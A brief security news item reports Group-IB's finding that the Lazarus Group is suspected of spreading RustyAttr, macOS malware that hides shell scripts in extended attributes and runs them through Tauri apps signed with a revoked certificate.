New RustyAttr Malware Targets macOS Through Extended Attribute Abuse


Threat actors, suspected to be the North Korea-linked Lazarus Group, have been exploiting a new technique involving macOS extended attributes to smuggle malware called RustyAttr. Singaporean firm Group-IB identified this activity, noting overlaps with previous Lazarus campaigns like RustBucket. The malware leverages extended attributes metadata to fetch and execute shell scripts via applications built using the Tauri framework and signed with a leaked certificate revoked by Apple. The applications display decoy messages or documents while a malicious JavaScript retrieves and executes the hidden payload using a Rust backend. Successful attacks require users to override macOS security protections, potentially aided by social engineering. The campaign's ultimate objectives remain unclear.

Read More


thumb-image

Solutions